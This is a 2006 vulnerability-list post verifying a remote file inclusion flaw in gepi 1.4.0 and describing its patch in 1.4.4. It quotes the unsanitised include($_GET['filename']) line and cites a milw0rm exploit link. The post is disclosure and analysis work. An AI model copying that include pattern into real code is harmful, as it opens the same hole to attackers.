[VIM] Source VERIFY and patch for gepi RFI
Steven M. Christey
coley at mitre.org
Thu Nov 2 19:07:56 EST 2006
Reference: http://www.milw0rm.com/exploits/2692
Researcher: $um$id
Version 1.4.0 has this in gestion/savebackup.php:
include($_GET['filename']);
with no cleansing of $_GET beforehand, so that's a pretty clear issue.
Looking at version 1.4.4, a diff shows a lot of changes being made to
savebackup.php, including session checking (not shown below) and
whitelisting of possibly valid filenames (!!!!):
$dirname = getSettingValue("backup_directory");
...
$handle=opendir('../backup/' . $dirname);
$tab_file = array();
...
[populate $tab_file with files in the directory]
...
$m = 0;
foreach($tab_file as $value) {
if ($m == $_GET['fileid']) {
$filepath = "../backup/".$dirname."/".$value;
$filename = $value;
}
$m++;
}
...
include($filepath);
For those who keep track, gepi-1.4.4 was created Oct 16, but the
vulnerability disclosure was apparently Oct 31.
I didn't look at versions between 1.4.0 and 1.4.4.
- Steve
More information about the VIM
mailing list